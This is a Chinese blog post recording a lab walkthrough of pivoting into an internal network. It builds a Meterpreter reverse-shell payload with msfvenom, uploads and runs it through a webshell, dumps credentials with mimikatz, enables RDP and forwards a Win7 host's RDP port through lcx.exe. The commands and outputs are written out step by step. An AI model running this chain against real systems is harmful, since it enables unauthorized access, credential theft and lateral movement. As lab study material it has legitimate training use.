当前位置:   article > 正文

内网端口转发与代理_端口代理

端口代理

思路:渗透的前提是双方能够建立通信。目前无法和win7建立通信,但是拿到了windows2003的权限,所以可以在Windows2003主机上面建立节点,作为跳板机去访问到内网。

目前状态:控制win2003(IP:192.168.1.200/10.1.3.128)
                  发现内网win7和win10
目的:通过控制的win2003  访问win7(IP:10.1.3.136如果是192.168.1.162也可以),
        win10无法远程连接??

攻击机:本地192.168.1.122
                VM kali:192.168.1.146(10.1.2.152)

MSF代理转发通信(正向连接)
1,利用MSF生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.146 lport=4444 -f exe >su.exe
结果:
    msf6 > msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.146 lport=4444 -f exe >su.exe
    [*] exec: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.146 lport=4444 -f exe >su.exe


2,msf进入监听模式
输入命令设置本地监听,具体命令如下:
启动msf:
        msfconsole
选择工具:
        use exploit/multi/handler
设置攻击语句:
        set payload windows/meterpreter/reverse_tcp
设置监听IP(注意IP地址是本地kali机器的IP地址):
        set lhost 192.168.1.146
设置监听端口:
        set lport 4444
开始监听:
        exploit或者run


3,使用webshell将脚本上传都目标服务器(蚁剑为例)

        2003中,phpstudy的端口为90,

        外网访问 http://192.168.1.200:90/phpinfo.php(相对内网来说)

蚁剑配置IP:192.168.1.200:90/123.php,密码为123
    编码器:选择base64(两个),点击测试,提示测试成功

通过蚁剑上传su.exe,
通过蚁剑的控制台运行su.exe
C:\phpStudy\WWW> su.exe

msf上线
[*] Started reverse TCP handler on 192.168.1.146:4444
[*] Sending stage (175686 bytes) to 192.168.1.200
[*] Meterpreter session 1 opened (192.168.1.146:4444 -> 192.168.1.200:1082) at 2024-04-29 00:57:12 -0400

【win2003中的IIS还有一个内部访问网站,IP为2003的IP(10.1.3.128),端口84,本地可以访问http://10.1.3.128:84

这里有两个网站,IIS的04网站是内网访问,PHPStudy的网站是外网访问,

被一句话木马控制的是php网站,蚁剑上传的木马也是上传到PHP网站内,所以这里跟IIS的网站好像无关。。。】


5,信息收集
调用mimikatz模块:
load mimikatz
收集账号密码:
creds_all
查看当前目标机器IP地址:
ipconfig
需要提升为system权限:
getsystem

查询权限
getuid

6,使用转发工具进行lcx.exe端口转发

        通过蚁剑上传lcx.exe到win2003


7,开启3389远程桌面(其实2003不开启3389,win7开启,也能端口转发,但是怎么开启win7的远程桌面呢?)
run getgui -e

[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[-] The specified meterpreter session script could not be found: getgui

上面运行失败,这时可以运行
run post/windows/manage/enable_rdp
结果:成功
meterpreter > run post/windows/manage/enable_rdp

[*] Enabling Remote Desktop
[*]     RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]     The Terminal Services service is not set to auto, changing it to auto ...
[*]     Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20240429034339_default_192.168.1.200_host.windows.cle_651229.txt


目前状态:控制win2003(IP:192.168.1.200/10.1.3.128)
            发现内网win7和win10
目的,通过控制的win2003访问win7(IP:192.168.1.162),
win10无法远程连接??

攻击机:本地192.168.1.122
        VMkali:192.168.1.146(10.1.2.152)


8,MSF进入shell命令行,执行命令,将目标机器的3389端口转发到攻击机的IP地址和自定义端口上
shell(注意,这里一定要进入shell,否则命令无效)
        lcx.exe -slave 192.168.1.122(攻击机) 53 10.1.3.136(win7,内网其它机器) 3389
        lcx.exe -slave 192.168.1.122 53 10.1.3.136 3389
说明:2003的通过端口转发,把内网另外一台机器的3389端口转发给攻击机53

这样也是可以的,如果不是内网IP的话

9,本地攻击机执行命令实现端口二次转发(lcx工具的规定用法)
打开本机(不是kali,目前是x13)中的
E:\......\工具\工具\lcx
目录下的1.bat,执行以下命令 (这条命令最好比第8条先执行)(其实就是在lcx.exe位置打开cmd.exe)
lcx.exe -listen 53 1234

10,攻击机打开远程桌面连接,直接连接本机的1234端口

目前存在的问题:怎么获取win7的账号密码,怎么开启win7的3389

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/天景科技苑/article/detail/953789
推荐阅读
相关标签
  

闽ICP备14008679号